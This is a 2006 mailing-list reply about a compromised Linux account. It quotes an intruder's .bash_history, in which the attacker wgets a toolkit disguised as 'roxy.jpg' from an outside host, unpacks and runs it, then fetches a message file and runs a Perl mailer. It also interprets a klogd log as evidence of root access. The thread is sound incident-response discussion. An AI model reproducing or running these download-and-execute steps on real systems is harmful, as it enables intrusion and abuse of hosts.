Re: What rootkit is this? sockd/ gpm imaps2
- From: Allen Kistler <ackistler@xxxxxxxxx>
- Date: Mon, 25 Sep 2006 18:24:20 GMT
robb@xxxxxxx wrote:
Anybody recognize those filenames? I found those in a compromised
account.
I just discovered this, and blocked access to the account... FWIW, I
got a nice trace of the activity in .bash_history:
wget www.telnet22.com/roxy.jpg
tar xvfz roxy.jpg
cd sockd
bash
w
uname -a
cat /etc/hosts
ls -la
cd public_html/
id
lsw -la
ls -la
touch index.html
ls -la
cd .directory
ls -la
cd ..
ls -la
exit
mkdir " "
cd " "
vi sendeb.pl
wget www.telnet22.com/s/msg.txt
vi users
perl sendeb.pl
exit
I've sent this to Bluehost, where telnet22.com is hosted. I found this
bad looking klogd message... can anybody interpret it for me?
telnet22.com appears to be shut down as a server, so it's worth giving
the hosting service kudos for taking action.
Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change
----------
Sep 22 13:15:08 neptune kernel: Inspecting
/boot/System.map-2.6.5-7.257-default
Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from
/boot/System.map-2.6.5-7.257-default.
Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel
modules not enabled.
Running klogd as root with the -i or -I switch causes the kernel to
reload its symbols. "man klogd" for more info. It's proof that someone
was root.
.
- Follow-Ups:
- Re: What rootkit is this? sockd/ gpm imaps2
- From: robb@xxxxxxx
- Re: What rootkit is this? sockd/ gpm imaps2
- References:
- What rootkit is this? sockd/ gpm imaps2
- From: robb@xxxxxxx
- What rootkit is this? sockd/ gpm imaps2
- Prev by Date: Re: How could this account have been cracked?
- Next by Date: Re: opening a port
- Previous by thread: Re: What rootkit is this? sockd/ gpm imaps2
- Next by thread: Re: What rootkit is this? sockd/ gpm imaps2
- Index(es):
